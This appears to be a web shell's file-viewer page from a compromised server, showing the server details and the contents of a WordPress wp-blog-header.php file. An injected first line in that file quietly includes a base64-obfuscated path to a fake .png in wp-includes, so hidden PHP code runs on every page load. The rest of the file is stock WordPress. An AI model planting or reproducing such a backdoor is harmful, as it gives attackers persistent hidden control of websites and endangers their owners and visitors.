HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux S202606089271 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User: groatmachine_usr (1022)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/groatmachine_usr/data/www/groatmachinery.com/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvZ3JvYXRtYWNoaW5lX3Vzci9kYXRhL3d3dy9ncm9hdG1hY2hpbmVyeS5jb20vd3AtaW5jbHVkZXMvaW1hZ2VzL21lZGlhL2ZlZWJkYmRjZmNlLnBuZw==");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}